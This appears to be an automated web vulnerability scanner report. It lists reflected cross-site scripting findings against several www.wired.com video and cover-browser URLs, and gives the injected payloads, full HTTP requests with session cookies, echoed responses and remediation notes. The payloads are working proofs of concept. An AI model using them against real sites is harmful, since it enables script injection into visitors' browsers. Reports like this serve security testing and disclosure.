GET /videode6de"><a>cf9acababf3/the-casting-of-galaxy-quest/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29408 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:12 GMT Date: Mon, 22 Nov 2010 00:51:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videode6de"><a>cf9acababf3 ss_the-casting-of-galaxy-quest c_21738564001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload c29b5--><script>alert(1)</script>ce95a1bfb75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29442 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:46 GMT Date: Mon, 22 Nov 2010 00:51:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84baf"><a>3f47118c743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/the-casting-of-galaxy-quest84baf"><a>3f47118c743/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:56:40 GMT Date: Mon, 22 Nov 2010 00:51:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_the-casting-of-galaxy-quest84baf"><a>3f47118c743 c_21738564001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec059"-alert(1)-"4c1b2a1edb6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/the-casting-of-galaxy-questec059"-alert(1)-"4c1b2a1edb6/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:57:36 GMT Date: Mon, 22 Nov 2010 00:52:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4f5"-alert(1)-"e85296498e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/the-casting-of-galaxy-quest/21738564001fa4f5"-alert(1)-"e85296498e4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:58:24 GMT Date: Mon, 22 Nov 2010 00:53:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 741cf"><a>d0dc860e958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/the-casting-of-galaxy-quest/21738564001741cf"><a>d0dc860e958 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:57:30 GMT Date: Mon, 22 Nov 2010 00:52:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_the-casting-of-galaxy-quest c_21738564001741cf"><a>d0dc860e958"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ae1"><a>6b2b010dbae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video24ae1"><a>6b2b010dbae/wired-magazine HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:20 GMT Date: Mon, 22 Nov 2010 00:51:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video24ae1"><a>6b2b010dbae ss_wired-magazine"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ea593--><script>alert(1)</script>4f1270fd104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29404 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:12 GMT Date: Mon, 22 Nov 2010 00:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfc46"-alert(1)-"1b8a9910d86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/wired-magazinebfc46"-alert(1)-"1b8a9910d86 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:58:12 GMT Date: Mon, 22 Nov 2010 00:53:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d785"><a>b9ac96fbebb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/wired-magazine7d785"><a>b9ac96fbebb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:57:12 GMT Date: Mon, 22 Nov 2010 00:52:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_wired-magazine7d785"><a>b9ac96fbebb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b64e"><a>0440a54481 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser2b64e"><a>0440a54481/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:09 GMT Date: Mon, 22 Nov 2010 01:07:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser2b64e"><a>0440a54481"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effcc"><a>54cc432a143 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsereffcc"><a>54cc432a143/1993 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:12:12 GMT Date: Mon, 22 Nov 2010 01:08:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsereffcc"><a>54cc432a143 c_1993"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dee65"><a>afd4fe05db5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1993dee65"><a>afd4fe05db5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:12:28 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1993dee65"><a>afd4fe05db5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd84f"><a>055ac53fcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsercd84f"><a>055ac53fcac/1994 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:34 GMT Date: Mon, 22 Nov 2010 01:08:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsercd84f"><a>055ac53fcac c_1994"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b287"><a>f4a04b9cc0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19945b287"><a>f4a04b9cc0f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:12:39 GMT Date: Mon, 22 Nov 2010 01:08:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19945b287"><a>f4a04b9cc0f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243b4"><a>a6be1769b46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser243b4"><a>a6be1769b46/1995 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:12:27 GMT Date: Mon, 22 Nov 2010 01:08:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser243b4"><a>a6be1769b46 c_1995"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7e4"><a>35b2608d8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19952c7e4"><a>35b2608d8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:12:28 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19952c7e4"><a>35b2608d8b"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2face"><a>4498e865eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser2face"><a>4498e865eb/1996 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:11:57 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
